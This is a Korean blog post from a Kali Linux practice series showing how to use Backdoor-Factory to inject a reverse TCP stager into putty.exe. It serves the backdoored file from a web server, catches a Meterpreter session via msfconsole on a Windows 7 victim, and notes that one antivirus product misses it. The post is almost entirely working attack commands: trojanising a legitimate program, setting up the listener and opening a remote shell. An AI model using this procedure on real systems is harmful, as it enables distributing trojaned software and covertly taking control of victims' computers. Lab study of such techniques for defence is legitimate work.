Self-Improvement

Backdoor-Factory을 이용한 실행 프로그램에 악성 코드 삽입 본문

Kali Linux/Tools 실습

Backdoor-Factory을 이용한 실행 프로그램에 악성 코드 삽입

JoGeun 2018. 10. 20. 14:07

*Backdoor-Factory으로 실행 프로그램에 악성 코드 삽입
 putty.exe 프로그램에 Backdoor-Factory을 이용하여 악성 코드를 삽입을 한다.
 즉 putty.exe프로그램을 실행하면 악성코드가 백그라운드로 실행되어진다.
 ※2017년 중반 이후의 putty.exe는 안되어짐

 Attacker : Kali
 Victim    : Windows 7


*실습
 현재 backdoor-factory는 실행이 안됨으로 직접 홈페이지에서 다운을 받는다.

 (kali)
 사전에 kali에 putty.exe가 있어야함
 #apt-get -y install backdoor-factory
 #mkdir -p /test
 #cp putty.exe /test
 #cd /test
 #file putty.exe

 #git clone https://github.com/secretsquirrel/the-backdoor-factory.git
 #cd the-backdoor-factory
 #./backdoor.py -f /test/putty.exe -H 192.168.20.50 -P 8080 -s iat_reverse_tcp_stager_threaded

 ※Available caves중에서 번호하나를 택한다.

 #cd backdoored (생성된 파일이 존재하는 곳)
 #file putty.exe 
 #cp putty.exe /var/www/html (웹서버로 다운을 받게 설정)
 #service apache2 restart
 #msfconsole -q
 msf > use exploit/multi/handler
 msf > set payload windows/meterpreter/reverse_tcp
 msf > set lhost 192.168.20.50
 msf > set lport 8080
 msf > exploit
 
 (windows 7)
 인터넷으로 192.168.20.50에 접속하여 putty.exe을 다운로드 받아서 실행을 한다.

실행을 한다.

 kali에서 확인해보면 Session이 연결된걸 확인할수 있다.

 (kali)

 msf > sessions -l
 msf > sessions -i 1
 meterpreter > sysinfo

 
*파일 검사
 http://www.virustotal.com에서 파일 점검

V3에서는.. 정상적인 파일이라고 나온다

알약에서는 검출이 됬다.